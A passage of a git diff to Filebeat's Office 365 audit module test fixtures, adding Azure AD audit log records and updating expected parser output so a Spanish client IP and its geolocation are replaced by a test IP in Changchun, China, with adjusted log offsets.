"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"NewValue": "asr@testsiem.onmicrosoft.com", "OldValue": "", "Name": "User.UPN"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json b/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
index 2ed3a80f2cdb..e921cb058040 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
@@ -1,8 +1,8 @@
 [
     {
         "@timestamp": "2020-02-09T15:33:26.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -46,9 +46,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:33:26",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -124,20 +124,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -148,8 +146,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:33:26.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -164,7 +162,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 5611,
+        "log.offset": 5609,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -193,9 +191,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:33:26",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -271,20 +269,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -295,8 +291,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:33:26.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -311,7 +307,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 11222,
+        "log.offset": 11218,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -340,9 +336,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:33:26",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -418,20 +414,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -442,8 +436,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:33:26.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -458,7 +452,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 16833,
+        "log.offset": 16827,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -487,9 +481,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:33:26",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -574,20 +568,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -598,8 +590,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:33:26.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -614,7 +606,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 20744,
+        "log.offset": 20736,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -643,9 +635,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:33:26",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -730,20 +722,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -754,8 +744,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -770,7 +760,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 24655,
+        "log.offset": 24645,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -799,9 +789,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -893,20 +883,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -917,8 +905,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -933,7 +921,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 29810,
+        "log.offset": 29798,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -962,9 +950,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:06",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1056,20 +1044,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1080,8 +1066,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:06.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Remove app role assignment from service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -1096,7 +1082,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 35008,
+        "log.offset": 34994,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -1125,9 +1111,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:06",
